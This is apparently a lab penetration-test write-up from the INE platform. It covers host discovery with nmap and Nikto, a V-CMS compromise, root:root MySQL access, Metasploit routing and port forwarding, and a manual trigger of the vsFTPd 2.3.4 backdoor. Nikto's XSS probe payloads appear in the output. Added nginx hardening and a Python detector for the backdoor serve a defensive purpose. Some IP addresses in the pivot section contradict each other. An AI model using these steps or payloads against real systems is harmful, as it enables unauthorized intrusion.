Black-Box Penetration Test 1 - 16.06.2022

Discovery of live hosts

root@INE:~# nmap -sn 192.222.122.2/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-16 16:46 IST
Nmap scan report for eu-central-4 (192.222.122.1)
Host is up (0.000058s latency).
MAC Address: 02:42:1B:4E:0E:03 (Unknown)
Nmap scan report for demo.ine.local (192.222.122.3)
Host is up (0.000014s latency).
MAC Address: 02:42:C0:DE:7A:03 (Unknown)
Nmap scan report for INE (192.222.122.2)
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.02 seconds

192.222.122.1
192.222.122.2
192.222.122.3

192.222.122.1

root@INE:~# nmap -sC -sV 192.222.122.1
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-16 16:54 IST
Nmap scan report for eu-central-4 (192.222.122.1)
Host is up (0.0000060s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d:7d:e8:5e:f7:e9:c6:0b:f9:6a:c3:e7:50:95:b8:89 (RSA)
|   256 c9:74:8e:16:fb:5b:1a:df:da:df:5d:85:98:78:fa:71 (ECDSA)
|_  256 88:da:ea:6c:0b:3e:c1:de:96:d5:f1:c7:ea:a5:8b:44 (ED25519)
80/tcp  filtered http
443/tcp filtered https
MAC Address: 02:42:1B:4E:0E:03 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds

192.222.122.3 (demo.ine.local)

root@INE:~# nmap -sC -sV 192.222.122.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-16 16:54 IST
Nmap scan report for demo.ine.local (192.222.122.3)
Host is up (0.0000090s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.14.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: V-CMS-Powered by V-CMS
|_http-server-header: nginx/1.14.0
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 02:42:C0:DE:7A:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.69 seconds

Nikto

root@INE:~# nikto --url demo.ine.local
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.222.122.3
+ Target Hostname:    demo.ine.local
+ Target Port:        80
+ Start Time:         2022-06-16 16:55:20 (GMT5.5)
---------------------------------------------------------------------------
+ Server: nginx/1.14.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2820: /index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-50552: /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-25497: /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
+ OSVDB-12606: /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2790: /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3092: /install/install.php: Install file found.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ 7863 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2022-06-16 16:55:26 (GMT5.5) (6 seconds)
---------------------------------------------------------------------------
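The Nikto findings above (missing X-Frame-Options and X-Content-Type-Options headers, a PHPSESSID cookie without the HttpOnly flag, and the leftover /install/install.php and /INSTALL.txt) map onto a short nginx and PHP-FPM configuration. The block below is an added example written for this report; it is not configuration from the original write-up or from V-CMS. The document root, the PHP-FPM socket path and the server block layout are assumptions; only the hostname and the findings come from the scan output.

```nginx
server {
    listen 80;
    server_name demo.ine.local;          # hostname from the report
    root /var/www/vcms;                  # assumed document root

    # Headers Nikto reported as absent. "always" also sends them on error responses.
    add_header X-Frame-Options "SAMEORIGIN" always;
    add_header X-Content-Type-Options "nosniff" always;
    # X-XSS-Protection is deliberately not added: current browsers ignore it;
    # a Content-Security-Policy tuned to the application is the real control.

    # Installer leftovers Nikto found: delete them from the web root; until
    # then, refuse to serve them.
    location ~ ^/(install/|INSTALL\.txt$) {
        return 404;
    }

    location ~ \.php$ {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        # PHP-FPM honours PHP_VALUE; this sets the HttpOnly flag on PHPSESSID
        fastcgi_param PHP_VALUE "session.cookie_httponly=1";
        fastcgi_pass unix:/run/php/php-fpm.sock;   # assumed PHP-FPM socket
    }
}
```

The cookie flag can equally be set in php.ini (session.cookie_httponly = 1); setting it per-site in the FastCGI parameters keeps the fix next to the vhost it belongs to. Re-running Nikto against the host is the quickest way to confirm the header and cookie findings no longer appear.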

Using Google, I found that V-CMS 1.0 has a serious vulnerability that gives immediate access to the machine with code execution.

In this case we also get full administrator rights. On the desktop, besides flag.txt 4f96a3e848d233d5af337c440e50fe3d, there is also a startup.sh file.

The database credentials root:root are visible.

show databases;
use database vcms;
ERROR 1049 (42000) at line 2: Unknown database 'database'
Database
information_schema
mysql
performance_schema
sys
vcms
Tables_in_vcms
active_guests
active_users
banned_users
configuration
domain_sort
domains
img_revisions
page_sort
pages
permissions
revisions
users

I manage to display the data from the vcms database and the users table, but there is nothing interesting there.

Routing to 192.144.125.0

Since I am using Metasploit, I can use a simple way to route traffic to the next hop in the network.

#ip route add 192.144.125.0/24 via 192.49.29.1

meterpreter > run autoroute -s 192.144.125.0/24 -n 255.255.255.0

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.144.125.0/255.255.255.0...
[+] Added route to 192.144.125.0/255.255.255.0 via 192.49.29.3
[*] Use the -p option to list all active routes

Port forwarding with Metasploit

Host 192.144.125.3 has port 21 open. This is currently the most important target. I am using the INE platform, and unfortunately a connection via VPN is not possible. Normally I would tunnel the port with the Chisel tool.

meterpreter > portfwd add -l 21 -p 21 -r 192.241.92.3

Next I check local port 1234.

This version is vulnerable to code execution: vsFTPd v2.3.4 Backdoor Command Execution (CVE-2011-2523).

https://metalkey.github.io/vsftpd-v234-backdoor-command-execution.html

https://www.youtube.com/watch?v=G7nIWUMvn0o&ab_channel=ExploitAcademy

Because the Metasploit exploit did not work correctly, I had to manage on my own.

In the username field you enter arbitrary text ending with :). In my case I entered 123456:). The password does not matter. A root-level connection is then started on port 6200.

Therefore I forward one more port.

portfwd add -l 6200 -p 6200 -r 192.241.92.3

flag.txt 58c7c29a8ab5e7c4c06256b954947f9a
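From the defender's side, the CVE-2011-2523 activity described above leaves two observable traces that the report itself names: a USER command ending in :) in the FTP log, and a follow-up TCP connection to port 6200 from the same client. The script below is an added example written for this report, not code from the original write-up or from vsftpd. The FTP log lines and the flow records are constructed samples in the style of vsftpd's log_ftp_protocol output and a simple "src dst dport" flow export; the regexes are assumptions about that format and should be adjusted to the real log source.

```python
import re

BACKDOOR_PORT = 6200   # port the vsftpd 2.3.4 backdoor listens on (from the report)
TRIGGER = ":)"         # suffix in the USER command that opens it (from the report)

# Constructed sample lines in the style of vsftpd's log_ftp_protocol=YES output.
FTP_LOG = """\
Thu Jun 16 16:55:20 2022 [pid 2] CONNECT: Client "192.0.2.10"
Thu Jun 16 16:55:21 2022 [pid 2] [alice] FTP command: Client "192.0.2.10", "USER alice"
Thu Jun 16 16:56:02 2022 [pid 3] CONNECT: Client "198.51.100.7"
Thu Jun 16 16:56:03 2022 [pid 3] [123456:)] FTP command: Client "198.51.100.7", "USER 123456:)"
"""

# Constructed sample flow records: "<src> <dst> <dst_port>" (e.g. exported from
# a firewall log or a Zeek conn.log); only the FTP host 192.144.125.3 appears.
CONN_LOG = """\
192.0.2.10 192.144.125.3 21
198.51.100.7 192.144.125.3 21
198.51.100.7 192.144.125.3 6200
"""

BANNER_RE = re.compile(r"vsFTPd\s+2\.3\.4\b")
USER_CMD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]+ \d{4}) \[pid \d+\] (?:\[[^\]]*\] )?'
    r'FTP command: Client "(?P<ip>[^"]+)", "USER (?P<user>.*)"$'
)


def is_affected_banner(banner: str) -> bool:
    """True if an FTP greeting identifies the backdoored vsftpd release."""
    return BANNER_RE.search(banner) is not None


def find_trigger_logins(log_text: str) -> list[dict]:
    """USER commands whose user name ends with the backdoor trigger."""
    hits = []
    for line in log_text.splitlines():
        m = USER_CMD_RE.match(line)
        if m and m.group("user").endswith(TRIGGER):
            hits.append({"ts": m.group("ts"), "ip": m.group("ip"), "user": m.group("user")})
    return hits


def find_backdoor_connections(conn_text: str, port: int = BACKDOOR_PORT) -> set[str]:
    """Source addresses that opened a TCP connection to the backdoor port."""
    sources = set()
    for line in conn_text.splitlines():
        parts = line.split()
        if len(parts) == 3 and int(parts[2]) == port:
            sources.add(parts[0])
    return sources


def correlate(ftp_text: str, conn_text: str) -> list[dict]:
    """Trigger logins, flagged when the same address also reached port 6200.

    A trigger on its own may be a scanner probe against a patched server; the
    follow-up connection to 6200 is what shows the backdoor actually opened.
    """
    backdoor_sources = find_backdoor_connections(conn_text)
    alerts = []
    for hit in find_trigger_logins(ftp_text):
        alerts.append(dict(hit, backdoor_connection=hit["ip"] in backdoor_sources))
    return alerts


if __name__ == "__main__":
    print("affected banner:", is_affected_banner("220 (vsFTPd 2.3.4)"))
    for alert in correlate(FTP_LOG, CONN_LOG):
        level = "HIGH" if alert["backdoor_connection"] else "MEDIUM"
        print(f"[{level}] {alert['ts']} {alert['ip']} USER {alert['user']!r}")
```

Run as a script it reports the banner check and one HIGH alert for 198.51.100.7. The banner check is the cheapest preventive signal: an inventory pass that greps FTP greetings for this version finds hosts to upgrade before any login attempt is ever logged.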